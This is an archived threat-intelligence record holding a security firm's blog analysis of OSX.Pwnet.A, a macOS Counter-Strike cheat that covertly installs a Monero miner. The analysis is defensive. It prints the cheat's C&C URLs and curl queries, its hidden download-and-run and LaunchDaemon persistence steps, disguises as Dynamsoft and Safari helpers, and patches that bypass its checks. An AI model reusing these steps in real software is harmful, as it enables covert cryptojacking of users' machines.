{
	"id": "1cd2d959-013f-441e-827b-4165ba0c871c",
	"created_at": "2026-04-06T00:19:36.863751Z",
	"updated_at": "2026-04-10T03:20:38.599361Z",
	"deleted_at": null,
	"sha1_hash": "2c5691a6a842f2eef2d6f7d09fe2d61478f6f817",
	"title": "CSGO Hacks for Mac That You Shouldn’t Trust",
	"llm_title": "",
	"authors": "",
	"file_creation_date": "0001-01-01T00:00:00Z",
	"file_modification_date": "0001-01-01T00:00:00Z",
	"file_size": 678199,
	"plain_text": "CSGO Hacks for Mac That You Shouldn’t Trust\r\nBy Arnaud Abbati\r\nPublished: 2017-08-23 · Archived: 2026-04-05 21:22:11 UTC\r\n(Photo source: Pony Strike: Global Offense by FilipinoNinja95)\r\nWe recently found Counter-Strike: Global Offensive (CS: Go) hacks on macOS that is also a trojan that could\r\nmine CryptoCurrencies without user consent.\r\nAccording to VirusTotal Retrohunt, the threat is in the wild since the beginning of July 2017.\r\nWarning: At the time of this writing, all URLs are live.\r\n Entry Point: Vlone.cc Portal\r\nThe entry point is vlone.cc portal, where a user can Register, Login and Download for free the hack installer.\r\nThe domain name was registered through eNom in April 2017, 14th, and resolves to a shared web host at\r\nnamecheap:\r\n$ dig vlone.cc +short\r\n198.54.115.80\r\n$ dig -x 198.54.115.80 +short\r\nserver205-2.web-hosting.com.\r\nHTTPS certificate was delivered by COMODO PositiveSSL in June 2017, 27th.\r\nWhen logged in, members can browse the Prices page and purchase a premium subscription for 1, 3 or 6 months\r\nthrough Selly:\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 1 of 8\n\nMembers download the same archive of the free installer than guests:\r\n$ curl -s https:\r\nb1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -\r\n$ curl -s https:\r\nb1bdb4502f5051309582f72a62c14d9919d3c86de3dcfa0b3a5f008cb5a018fe -\r\nAccording to the user GET query value, members count in August 2017, 22nd, is nearly two thousand.\r\nWe don’t know if the private installer of the hack also installs the mining software without user consent.\r\nBinaries analysis\r\nIt’s all C++ Standard Library code. Network connections use libcurl and secure HTTPS protocol.\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 2 of 8\n\nAll executables, but the miner CLI, require super-user privileges, so the user must run the installer with sudo :\r\n$ ./vHook\r\nRoot access required!\r\nPlease type \"sudo ./vhook\"\r\nThe main binary hides itself as Dynamic Web TWAIN, an online document scanning platform.\r\nvHook\r\nvHook is the installer. It is packed with UPX, probably to avoid user analysis and bypass some security products.\r\nIt is a command line interface:\r\n$ sudo ./vHook\r\n[vlone] vHook public [vlone]\r\nUsername: USERNAME\r\nPassword: PASSWORD\r\n[vlone] Welcome to vHook Public, USERNAME!\r\n[vlone] Downloading vHook assets..\r\n[vlone] Inflating vHook assets..\r\n[vlone] CS:GO is not running!\r\n[vlone] Cleaning up..\r\n[vlone] Quitting...\r\nWith a valid member account, it downloads and extracts bootstrap.dylib and vhook.dylib from\r\nhttps://vlone.cc/portal/gateway.php as assets.zip to /Library/Application Support/ :\r\n$ curl -s https://vlone.cc/portal/gateway.php -G -d username=USERNAME -d password=PASSWORD -d free |\r\n00000000: 504b 0304 1400 0000 0800 8696 c14a 9c2e PK...........J..\r\n00000010: 55c2 b606 0000 1827 0000 0f00 1c00 626f U......'......bo\r\n00000020: 6f74 7374 7261 702e 6479 6c69 6255 5409 otstrap.dylibUT.\r\n00000030: 0003 9cb9 2f59 d339 8059 7578 0b00 0104 ..../Y.9.Yux....\r\nIt loads bootstrap.dylib from osxinj project. If Counter-Strike: Global Offensive is running, it downloads and\r\nextracts some fonts ( https://vlone.cc/fontfix.zip as vlone.zip to /Library/Fonts/ ), and injects\r\nvhook.dylib into csgo_osx64 process.\r\nIt could be a perfect deal for a CS: GO user, but it turns out vHook also sneaky downloads and extracts\r\nhttps://vlone.cc/abc/assets/asset.zip as fonts.zip to /var/ , changes directory to /var and runs  sudo\r\n./helper \u0026 .\r\nIt then kills Terminal application to hide the detached process output.\r\nhelper\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 3 of 8\n\nhelper is the miner downloader dropper. It is also packed with UPX.\r\nIt first asks the C\u0026C server for the name of the binary to execute upon download:\r\n$ curl https://www.vlone.cc/abc/commands/update.php?request -F command=newfile\r\ncom.dynamsoft.webhelper\r\nIt downloads https://www.vlone.cc/abc/assets/b.zip as /b.zip , extracts its contents to /var/.log/ ,\r\nchanges directory to /var/.log/ and runs  sudo ./com.dynamsoft.WebHelper \u0026 .\r\nAt the time of this writing, https://www.vlone.cc/abc/assets/b.zip URL response is a File Not Found 404\r\nerror code, but https://www.vlone.cc/abc/assets/bz.zip URL is live and send the expected archive.\r\ncom.dynamsoft.WebHelper\r\ncom.dynamsoft.WebHelper is the miner downloader. Despite the name, it is not related to Dynamsoft.\r\nIt starts by downloading and extracting:\r\nWebTwainService  from https://www.vlone.cc/abc/assets/d.zip to /var/.log/\r\ncom.dynamsoft.WebTwainService.plist  from https://www.vlone.cc/abc/assets/p.zip to\r\n/Library/LaunchDaemons/\r\nIt loads the daemon, sends computer unique identifier (UUID) and its version to C\u0026C server, and checks if it\r\nmeetsRequirements() , i.e. running as root and not in a debugger:\r\n$ curl -s https:\r\ncreated continue\r\nIt then sleeps for one hour. If one is in a hurry, he or she can cut out the nap easily:\r\n__text:0000000100016A5F BF 01 00 00 00 mov edi, 1800 ; unsigned int\r\n__text:0000000100016A64 E8 5B 72 00 00 call _sleep\r\nOnce rested, it sends commands to C\u0026C server every minute to ask if it should mine and update or kill itself:\r\n$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F command=mine\r\ntrue\r\n$ curl -s https://www.vlone.cc/abc/commands/update.php?request -F command=update\r\nfalse\r\n$ curl -s https://www.vlone.cc/abc/commands/kill.php?request -F command=kill\r\nfalse\r\nEvery minute, it also creates or updates the mining thread to:\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 4 of 8\n\ndownload and extract https://www.vlone.cc/abc/assets/helper.zip to /var/.trash/.assets/\r\nget miner settings (maximum core number, currency, email address)\r\ncheck if Activity Monitor is running\r\ncheck if it is already mining\r\ncheck if it should stop mining\r\nrun cd /var/.trash/.assets/; ./com.apple.SafariHelper with appropriate arguments\r\nRead more: SENTINELONE – THE BEST AV FOR MACOS\r\nWebTwainService\r\nWebTwainService tries to take care of com.dynamsoft.webhelper persistency. It is again packed with UPX.\r\nIt sets its current directory to /var/.log and runs  sudo ./com.dynamsoft.webhelper \u0026 , then recursively sleeps\r\nfor one hour…\r\nminergate-cli\r\ncom.apple.SafariHelper actually is the official MinerGate CLI v4.04:\r\n$ shasum -a 256 MinerGate-cli-4.04-Mac/minergate-cli com.apple.SafariHelper\r\nb943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 MinerGate-cli-4.04-Mac/minergate-cli\r\nb943369a2ae7afb3522f3b1c40c15208bff0444d47d0df476dd585cf9cbf7c10 com.apple.SafariHelper\r\nIt is written in Qt, so it comes with frameworks:\r\n$ find /private/.trash -type f\r\n/private/.trash/.assets/com.apple.SafariHelper\r\n/private/.trash/.assets/Frameworks/QtCore.framework/Versions/5/QtCore\r\n/private/.trash/.assets/Frameworks/QtNetwork.framework/Versions/5/QtNetwork\r\n/private/.trash/.assets/Frameworks/QtSql.framework/Versions/5/QtSql\r\n/private/.trash/.assets/Frameworks/QtWebSockets.framework/Versions/5/QtWebSockets\r\nIt takes as CPU as requested by com.dynamsoft.WebHelper so the user enjoys the delight of computer’s fans\r\nbackground music:\r\n$ ps axu | grep [c]om.apple.SafariHelper\r\nroot 474 200.0 0.2 2490592 14204 s000 R+ 3:07AM 3:21.87 ./com.apple.SafariHelper -user pwnedboi@proto\r\nIn this example, it is mining Monero (XMR) with all virtual machine cores (two: 200.0%).\r\nCurrent MinerGate email address is pwnedboi@protonmail.com , and xxanax420@gmail.com email address was\r\nalso found hardcoded in another sample.\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 5 of 8\n\nMaximum core number, CryptoCurrency and email address are provided by com.dynamsoft.WebHelper and the\r\nC\u0026C server:\r\n$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=cores\r\n4\r\n$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=coin\r\nxmr\r\n$ curl -s https://www.vlone.cc/abc/commands/mine.php?request -F mine=email\r\npwnedboi@protonmail.com\r\nvLoader\r\nWe finally ended up with vLoader , the private installer, and, once more, it is packed with UPX.\r\nIt does many checks against the C\u0026C server:\r\n$ curl -s https://www.vlone.cc/pwned.php -F user=USERNAME -F pass=PASSWORD -F hwid=$(uuidgen)\r\n204\r\n$ curl -s https://www.vlone.cc/sub.php -F user=USERNAME\r\n00/00/0000\r\nThey are trivial to bypass for anyone who can force a conditional jump:\r\n__text:0000000100010570 A8 01 test al, 1\r\n__text:0000000100010572 90 E9 05 00 00 00 jnz loc_10001057D\r\n__text:0000000100010578 E9 08 01 00 00 jmp loc_100010685\r\n__text:000000010001057D ; ---------------------------------------------------------------------------\r\n__text:000000010001057D\r\n__text:000000010001057D loc_10001057D: ; CODE XREF: dna8o::in(void)+862\r\n__text:000000010001057D 48 8B 3D 94 5A 00 00 mov rdi, cs:__ZNSt3__14coutE_ptr\r\n__text:0000000100010584 48 8D 35 84 53 00 00 lea rsi, aLoggedInSucces ; \"Logged in successfully\"\r\nPrivate payloads are downloaded and extracted to /var/.old/ :\r\nboots.dylib from http://vlone.cc/clear/sadmio.zip\r\n.uhdexter.dylib from http://vlone.cc/clear/getout.zip\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 6 of 8\n\nCompared to the free injected library, the private hook is very similar:\r\nvLoader doesn’t uninstall any of the free version naughty payloads.\r\nFinn and ponies\r\nWe didn’t spend too much time reverse engineering vhook.dylib . The source code was available on\r\nGitHub (archive) and videos of the hack are also available on YouTube here and there.\r\nGitHub owner of the vHook project is fetusfinn (original author is ViKiNG) and we coincidentally found debugger\r\nsymbols matching Finn username in GitHub’s libvHook.dylib  and in all analyzed binaries:\r\n$ for f in github.com/fetusfinn/vHook/libvHook.dylib \\\r\n vHook_unpacked helper_unpacked com.dynamsoft.WebHelper WebTwainService_unpacked\r\ndo\r\n nm -a \"$f\" | grep -m 1 Finn\r\ndone\r\n0000000000000000 - 00 0000 SO /Users/Finn/Desktop/c++/vHook/\r\n0000000000000000 - 00 0000 SO /Users/Finn/Downloads/Archive/vloneLoader/\r\n0000000000000000 - 00 0000 SO /Users/Finn/Desktop/pwnednet/pwnednet/installer/installer/\r\n0000000000000000 - 00 0000 SO /Users/Finn/Desktop/pwnednet/pwnednet/pwnednet/\r\n0000000000000000 - 00 0000 SO /Users/Finn/Downloads/WebTwainService/WebTwainService/WebTwainService/\r\nThis is how we know Finn’s project name is pwnednet . Shortened to pwnet, it sounds like poney in French, i.e.\r\npony in English and, everybody loves ponies, so here you have OSX.Pwnet.A!\r\nThere also is a reference to someone named Jennifer Johansson in Xcode user data:\r\n$ find github.com/fetusfinn/vHook -type f -path \"*nnif*\"\r\ngithub.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcdebugger/Breakp\r\ngithub.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcschemes/vHook.x\r\ngithub.com/fetusfinn/vHook/vHook.xcodeproj/xcuserdata/jenniferjohansson.xcuserdatad/xcschemes/xcschem\r\nWe didn’t take the time to ask pwned’s boyfriend on Discord if Finn is much into ponies:\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 7 of 8\n\nBut, just in case, here is a Dutch Pony for Finn and her team.\r\nFrom Hackestria with ❤\r\nEDIT: added vLoader on 2017/08/29.\r\nSource: https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nhttps://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/\r\nPage 8 of 8",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"Malpedia"
	],
	"references": [
		"https://sentinelone.com/blog/osx-pwnet-a-csgo-hack-and-sneaky-miner/"
	],
	"report_names": [
		"osx-pwnet-a-csgo-hack-and-sneaky-miner"
	],
	"threat_actors": [],
	"ts_created_at": 1775434776,
	"ts_updated_at": 1775791238,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2c5691a6a842f2eef2d6f7d09fe2d61478f6f817.pdf",
		"text": "https://archive.orkl.eu/2c5691a6a842f2eef2d6f7d09fe2d61478f6f817.txt",
		"img": "https://archive.orkl.eu/2c5691a6a842f2eef2d6f7d09fe2d61478f6f817.jpg"
	}
}